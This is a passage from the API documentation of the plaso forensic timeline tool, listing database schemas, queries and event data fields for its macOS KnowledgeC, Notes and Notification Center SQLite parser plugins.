Z_DKSUNRISESUNSETMETADATAKEY__PREVIOUSSUNSET TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR UNIQUE, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_10EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_10EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}, {'ZADDITIONCHANGESET': 'CREATE TABLE ZADDITIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZCONTEXTUALCHANGEREGISTRATION': 'CREATE TABLE ZCONTEXTUALCHANGEREGISTRATION ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCREATIONDATE TIMESTAMP, ZIDENTIFIER VARCHAR, ZPROPERTIES BLOB )', 'ZCONTEXTUALKEYPATH': 'CREATE TABLE ZCONTEXTUALKEYPATH ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDEVICEID INTEGER, ZISEPHEMERAL INTEGER, ZISUSERCENTRIC INTEGER, ZCREATIONDATE TIMESTAMP, ZLASTMODIFIEDDATE TIMESTAMP, ZKEY VARCHAR, ZVALUE BLOB )', 'ZCUSTOMMETADATA': 'CREATE TABLE ZCUSTOMMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZDATEVALUE TIMESTAMP, ZDOUBLEVALUE FLOAT, ZNAME VARCHAR, ZSTRINGVALUE VARCHAR, ZVALUEHASH VARCHAR, ZBINARYVALUE BLOB )', 'ZDELETIONCHANGESET': 'CREATE TABLE ZDELETIONCHANGESET ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZVERSION INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCKFOREIGNKEY VARCHAR, ZCKRECORDID VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZCHANGESET BLOB, ZCKRECORDSYSTEMFIELDS BLOB )', 'ZHISTOGRAM': 'CREATE TABLE ZHISTOGRAM ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZSTREAMTYPECODE INTEGER, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZCUSTOMIDENTIFIER VARCHAR, ZDEVICEIDENTIFIER VARCHAR, ZIDENTIFIER VARCHAR, ZSTREAMNAME VARCHAR )', 'ZHISTOGRAMVALUE': 'CREATE TABLE ZHISTOGRAMVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZINTEGERVALUE INTEGER, ZHISTOGRAM INTEGER, ZCOUNT FLOAT, ZSTRINGVALUE VARCHAR )', 'ZKEYVALUE': 'CREATE TABLE ZKEYVALUE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZDOMAIN VARCHAR, ZKEY VARCHAR, ZVALUE BLOB )', 'ZOBJECT': 'CREATE TABLE ZOBJECT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUUIDHASH INTEGER, ZEVENT INTEGER, ZSOURCE INTEGER, ZCATEGORYTYPE INTEGER, ZINTEGERVALUE INTEGER, ZENDDAYOFWEEK INTEGER, ZENDSECONDOFDAY INTEGER, ZHASCUSTOMMETADATA INTEGER, ZHASSTRUCTUREDMETADATA INTEGER, ZSECONDSFROMGMT INTEGER, ZSHOULDSYNC INTEGER, ZSTARTDAYOFWEEK INTEGER, ZSTARTSECONDOFDAY INTEGER, ZVALUECLASS INTEGER, ZVALUEINTEGER INTEGER, ZVALUETYPECODE INTEGER, ZSTRUCTUREDMETADATA INTEGER, ZVALUE INTEGER, Z9_VALUE INTEGER, ZIDENTIFIERTYPE INTEGER, ZQUANTITYTYPE INTEGER, ZOBJECT INTEGER, Z9_OBJECT INTEGER, ZSUBJECT INTEGER, Z9_SUBJECT INTEGER, ZCREATIONDATE TIMESTAMP, ZLOCALCREATIONDATE TIMESTAMP, ZCONFIDENCE FLOAT, ZENDDATE TIMESTAMP, ZSTARTDATE TIMESTAMP, ZVALUEDOUBLE FLOAT, ZDOUBLEVALUE FLOAT, ZUUID VARCHAR, ZSTREAMNAME VARCHAR, ZVALUESTRING VARCHAR, ZSTRING VARCHAR, ZVERBPHRASE VARCHAR, ZMETADATA BLOB )', 'ZSOURCE': 'CREATE TABLE ZSOURCE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZUSERID INTEGER, ZBUNDLEID VARCHAR, ZDEVICEID VARCHAR, ZGROUPID VARCHAR, ZITEMID VARCHAR, ZSOURCEID VARCHAR )', 'ZSTRUCTUREDMETADATA': 'CREATE TABLE ZSTRUCTUREDMETADATA ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, Z_CDPORTRAITMETADATAKEY__ALGORITHM INTEGER, Z_CDPORTRAITMETADATAKEY__ASSETVERSION INTEGER, Z_DKAPPINSTALLMETADATAKEY__ISINSTALL INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISELIGIBLEFORPREDICTION INTEGER, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ISPUBLICLYINDEXABLE INTEGER, Z_DKAPPLICATIONMETADATAKEY__PROCESSIDENTIFIER INTEGER, Z_DKAUDIOMETADATAKEY__ROUTECHANGEREASON INTEGER, Z_DKBLUETOOTHMETADATAKEY__DEVICETYPE INTEGER, Z_DKBULLETINBOARDMETADATAKEY__HASDATE INTEGER, Z_DKDIGITALHEALTHMETADATAKEY__USAGETYPE INTEGER, Z_DKGLANCELAUNCHMETADATA__DEVICEIDENTIFIER INTEGER, Z_DKINTENTMETADATAKEY__DONATEDBYSIRI INTEGER, Z_DKINTENTMETADATAKEY__INTENTHANDLINGSTATUS INTEGER, Z_DKINTENTMETADATAKEY__INTENTTYPE INTEGER, Z_DKNOWPLAYINGMETADATAKEY__IDENTIFIER INTEGER, Z_DKNOWPLAYINGMETADATAKEY__PLAYING INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__INTERACTIONTYPE INTEGER, Z_DKSEARCHFEEDBACKMETADATAKEY__SUGGESTIONTYPE INTEGER, Z_QPMETRICSMETADATAKEY__QUERYENGAGED INTEGER, Z_QPMETRICSMETADATAKEY__RESULTENGAGED INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_DATE INTEGER, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_ENDDATE INTEGER, Z_CDPORTRAITMETADATAKEY__DECAYRATE FLOAT, Z_CDPORTRAITMETADATAKEY__SCORE FLOAT, Z_DKAPPLICATIONACTIVITYMETADATAKEY__EXPIRATIONDATE TIMESTAMP, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LONGITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LATITUDE FLOAT, Z_DKLOCATIONMETADATAKEY__LONGITUDE FLOAT, Z_DKNOWPLAYINGMETADATAKEY__DURATION FLOAT, Z_DKNOWPLAYINGMETADATAKEY__ELAPSED FLOAT, Z_DKPERIODMETADATAKEY__PERIODEND TIMESTAMP, Z_DKPERIODMETADATAKEY__PERIODSTART TIMESTAMP, Z_QPMETRICSMETADATAKEY__TIMESTAMP FLOAT, Z_CDENTITYMETADATAKEY__BESTLANGUAGE VARCHAR, Z_CDENTITYMETADATAKEY__NAME VARCHAR, Z_CDPORTRAITMETADATAKEY__OSBUILD VARCHAR, Z_DKAPPINSTALLMETADATAKEY__PRIMARYCATEGORY VARCHAR, Z_DKAPPINSTALLMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ACTIVITYTYPE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__CONTENTDESCRIPTION VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDUNIQUEIDENTIFIER VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__SUGGESTEDINVOCATIONPHRASE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__TITLE VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYREQUIREDSTRING VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__USERACTIVITYUUID VARCHAR, Z_DKAPPLICATIONMETADATAKEY__BACKBOARDSTATE VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONCONTAININGBUNDLEIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__EXTENSIONHOSTIDENTIFIER VARCHAR, Z_DKAPPLICATIONMETADATAKEY__LAUNCHREASON VARCHAR, Z_DKAUDIOMETADATAKEY__CHANNELS VARCHAR, Z_DKAUDIOMETADATAKEY__DATASOURCES VARCHAR, Z_DKAUDIOMETADATAKEY__IDENTIFIER VARCHAR, Z_DKAUDIOMETADATAKEY__PORTNAME VARCHAR, Z_DKAUDIOMETADATAKEY__PORTTYPE VARCHAR, Z_DKAUDIOMETADATAKEY__PREFERREDDATASOURCE VARCHAR, Z_DKAUDIOMETADATAKEY__SELECTEDDATASOURCE VARCHAR, Z_DKBATTERYSAVERMETADATAKEY__SOURCE VARCHAR, Z_DKBLUETOOTHMETADATAKEY__ADDRESS VARCHAR, Z_DKBLUETOOTHMETADATAKEY__NAME VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__FEED VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__MESSAGE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__SUBTITLE VARCHAR, Z_DKBULLETINBOARDMETADATAKEY__TITLE VARCHAR, Z_DKCALENDARMETADATAKEY__INTERACTION VARCHAR, Z_DKCALLMETADATAKEY__INTERACTION VARCHAR, Z_DKDEVICEIDMETADATAKEY__DEVICEIDENTIFIER VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBDOMAIN VARCHAR, Z_DKINTENTMETADATAKEY__INTENTCLASS VARCHAR, Z_DKINTENTMETADATAKEY__INTENTVERB VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__URL VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__CITY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__COUNTRY VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__DISPLAYNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__FULLYFORMATTEDADDRESS VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__LOCATIONNAME VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__POSTALCODE_V2 VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__STATEORPROVINCE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__SUBTHOROUGHFARE VARCHAR, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__THOROUGHFARE VARCHAR, Z_DKLOCATIONMETADATAKEY__IDENTIFIER VARCHAR, Z_DKMETADATAHOMEAPPVIEW__HOMEUUID VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWINFORMATION VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWNAME VARCHAR, Z_DKMETADATAHOMEAPPVIEW__VIEWUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__ACCESSORYUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CHARACTERISTICTYPE VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICENAME VARCHAR, Z_DKMETADATAHOMEKITACCESSORYCONTROL__SERVICETYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETTYPE VARCHAR, Z_DKMETADATAHOMEKITSCENE__ACTIONSETUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__CLIENTNAME VARCHAR, Z_DKMETADATAHOMEKITSCENE__HOMEUUID VARCHAR, Z_DKMETADATAHOMEKITSCENE__SCENENAME VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__LOCATIONDISTRIBUTION VARCHAR, Z_DKMICROLOCATIONMETADATAKEY__MICROLOCATIONDISTRIBUTION VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__BUNDLEID VARCHAR, Z_DKNOTIFICATIONUSAGEMETADATAKEY__IDENTIFIER VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ALBUM VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__ARTIST VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__GENRE VARCHAR, Z_DKNOWPLAYINGMETADATAKEY__TITLE VARCHAR, Z_DKRELEVANTSHORTCUTMETADATAKEY__KEYIMAGEPROXYIDENTIFIER VARCHAR, Z_DKSAFARIHISTORYMETADATAKEY__TITLE VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CLIENT VARCHAR, Z_DKSEARCHFEEDBACKMETADATAKEY__CONTACTID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSOURCEDEVICEID VARCHAR, Z_DKTOMBSTONEMETADATAKEY__EVENTSTREAMNAME VARCHAR, Z_QPMETRICSMETADATAKEY__QUERY VARCHAR, ZCOM_APPLE_CALENDARUIKIT_USERACTIVITY_EXTERNALID VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTIDENTIFIERKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONCLIENTLAUNCHKEY VARCHAR, ZKCDCSNOTIFICATIONOPTIONPERSISTENTPREDICATESTRINGKEY VARCHAR, ZMETADATAHASH VARCHAR, Z_DKAPPLICATIONACTIVITYMETADATAKEY__ITEMRELATEDCONTENTURL VARCHAR, Z_DKDIGITALHEALTHMETADATAKEY__WEBPAGEURL VARCHAR, Z_DKAPPINSTALLMETADATAKEY__SUBCATEGORIES BLOB, Z_DKINTENTMETADATAKEY__SERIALIZEDINTERACTION BLOB, Z_DKLOCATIONAPPLICATIONACTIVITYMETADATAKEY__PHONENUMBERS BLOB, Z_DKRELEVANTSHORTCUTMETADATAKEY__SERIALIZEDRELEVANTSHORTCUT BLOB, Z_QPMETRICSMETADATAKEY__CANDIDATELIST BLOB, Z_QPMETRICSMETADATAKEY__QUERYLIST BLOB )', 'ZSYNCPEER': 'CREATE TABLE ZSYNCPEER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, ZCLOUDID VARCHAR, ZDEVICEID VARCHAR, ZRAPPORTID VARCHAR, ZUUID BLOB )', 'Z_4EVENT': 'CREATE TABLE Z_4EVENT ( Z_4CUSTOMMETADATA INTEGER, Z_11EVENT INTEGER, PRIMARY KEY (Z_4CUSTOMMETADATA, Z_11EVENT) )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUID VARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAME VARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}]

class plaso.parsers.sqlite_plugins.mac_knowledgec.MacKnowledgeCSafariEventDataBases: plaso.containers.events.EventData

MacOS Duet / KnowledgeC database event data for Safari.

bundle_identifierbundle identifier of the application.

Type str

durationduration of the activity.

Type int


Type str

urlURL visited.

Type str

DATA_TYPE = 'mac:knowledgec:safari'

plaso.parsers.sqlite_plugins.mac_notes module

SQLite parser plugin for MacOS Notes database files.

class plaso.parsers.sqlite_plugins.mac_notes.MacNotesEventDataBases: plaso.containers.events.EventData

Mac Notes event data.

textnote text.



Type str

titlenote title.

Type str

DATA_TYPE = 'mac:notes:note'

class plaso.parsers.sqlite_plugins.mac_notes.MacNotesPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS notes database files.

The MacOS Notes database file is typically stored in: test_data/NotesV7.storedata

DATA_FORMAT = 'MacOS Notes SQLite database (NotesV7.storedata) file'

NAME = 'mac_notes'

ParseZHTMLSTRINGRow(parser_mediator, query, row, **unused_kwargs)Parses a row from the database.

Parameters



• row (sqlite3.Row) – row resulting from query.

QUERIES = [('SELECT ZNOTEBODY.ZHTMLSTRING AS zhtmlstring, ZNOTE.ZDATECREATED AS timestamp, ZNOTE.ZDATEEDITED AS last_modified_time, ZNOTE.ZTITLE as title FROM ZNOTEBODY, ZNOTE WHERE ZNOTEBODY.Z_PK = ZNOTE.Z_PK', 'ParseZHTMLSTRINGRow')]

REQUIRED_STRUCTURE = {'ZNOTE': frozenset({'ZDATECREATED', 'ZDATEEDITED', 'ZTITLE'}), 'ZNOTEBODY': frozenset({'ZHTMLSTRING'})}

SCHEMAS = [{'ZACCOUNT': 'CREATE TABLE ZACCOUNT ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZALLOWINSECUREAUTHENTICATION INTEGER,ZDIDCHOOSETOMIGRATE INTEGER, ZENABLED INTEGER, ZROOTFOLDERINTEGER, Z6_ROOTFOLDER INTEGER, ZTRASHFOLDER INTEGER,ZGMAILCAPABILITIESSUPPORT INTEGER, ZPORT INTEGER,ZSECURITYLAYERTYPE INTEGER, ZMIGRATIONOFFERED INTEGER,ZACCOUNTDESCRIPTION VARCHAR, ZEMAILADDRESS VARCHAR, ZFULLNAMEVARCHAR, ZPARENTACACCOUNTIDENTIFIER VARCHAR, ZUSERNAME VARCHAR,ZFOLDERHIERARCHYSYNCSTATE VARCHAR, ZAUTHENTICATION VARCHAR,ZHOSTNAME VARCHAR, ZSERVERPATHPREFIX VARCHAR, ZEXTERNALURL BLOB,ZINTERNALURL BLOB, ZLASTUSEDAUTODISCOVERURL BLOB,ZTLSCERTIFICATE BLOB )', 'ZATTACHMENT': 'CREATE TABLE ZATTACHMENT ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZCONTENTID VARCHAR, ZFILEURL BLOB )', 'ZFOLDER': 'CREATE TABLE ZFOLDER ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZACCOUNT INTEGER, Z1_ACCOUNT INTEGER, ZPARENTINTEGER, Z6_PARENT INTEGER, ZISDISTINGUISHED INTEGER,ZALLEGEDHIGHESTMODIFICATIONSEQUENCE INTEGER,ZCOMPUTEDHIGHESTMODIFICATIONSEQUENCE INTEGER, ZUIDNEXT INTEGER,ZUIDVALIDITY INTEGER, ZTRASHACCOUNT INTEGER, Z1_TRASHACCOUNTINTEGER, ZNAME VARCHAR, ZCHANGEKEY VARCHAR, ZFOLDERID VARCHAR,ZSYNCSTATE VARCHAR, ZSERVERNAME VARCHAR )', 'ZNOTE': 'CREATE TABLE ZNOTE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER,Z_OPT INTEGER, ZBODY INTEGER, ZFOLDER INTEGER, Z6_FOLDERINTEGER, ZMIMEDATASIZE INTEGER, ZDATECREATED TIMESTAMP,ZDATEEDITED TIMESTAMP, ZREMOTEID VARCHAR, ZTITLE VARCHAR,ZCHANGEKEY VARCHAR, ZUNIVERSALLYUNIQUEID BLOB )', 'ZNOTEBODY': 'CREATE TABLE ZNOTEBODY ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER,ZHTMLSTRING VARCHAR )', 'ZOFFLINEACTION': 'CREATE TABLE ZOFFLINEACTION ( Z_PK INTEGER PRIMARY KEY, Z_ENTINTEGER, Z_OPT INTEGER, ZSEQUENCENUMBER INTEGER, ZACCOUNTINTEGER, Z1_ACCOUNT INTEGER, ZFOLDER INTEGER, Z6_FOLDER INTEGER,ZPARENT INTEGER, Z6_PARENT INTEGER, ZORIGINALPARENT INTEGER,Z6_ORIGINALPARENT INTEGER, ZFOLDER1 INTEGER, Z6_FOLDER1 INTEGER,ZNOTE INTEGER, Z10_NOTE INTEGER, ZORIGINALFOLDER INTEGER,Z6_ORIGINALFOLDER INTEGER )', 'Z_METADATA': 'CREATE TABLE Z_METADATA (Z_VERSION INTEGER PRIMARY KEY, Z_UUIDVARCHAR(255), Z_PLIST BLOB)', 'Z_MODELCACHE': 'CREATE TABLE Z_MODELCACHE (Z_CONTENT BLOB)', 'Z_PRIMARYKEY': 'CREATE TABLE Z_PRIMARYKEY (Z_ENT INTEGER PRIMARY KEY, Z_NAMEVARCHAR, Z_SUPER INTEGER, Z_MAX INTEGER)'}]

plaso.parsers.sqlite_plugins.mac_notificationcenter module

SQLite parser plugin for MacOS Notification Center database files.

class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventDataBases: plaso.containers.events.EventData

MacOS NotificationCenter event data.

bodybody of the notification message.

Type str

bundle_namename of the application’s bundle that generated the notification.

Type str

presentedeither 1 or 0 if the notification has been shown to the user.

Type int

subtitleoptional. Subtitle of the notification message.

Type str



titletitle of the message. Usually the name of the application that generated the notification. Occasionally thename of the sender of the notification for example, in case of chat messages.

Type str

DATA_TYPE = 'mac:notificationcenter:db'

class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS Notification Center database files.

The MacOS Notification Center database file is typically stored in: /pri-vate/var/folders/<W><d>/../0/com.apple.notificationcenter/db2/db

At the moment it takes into consideration only the main table, ‘record’. Currently supported tables and relatedcontent:

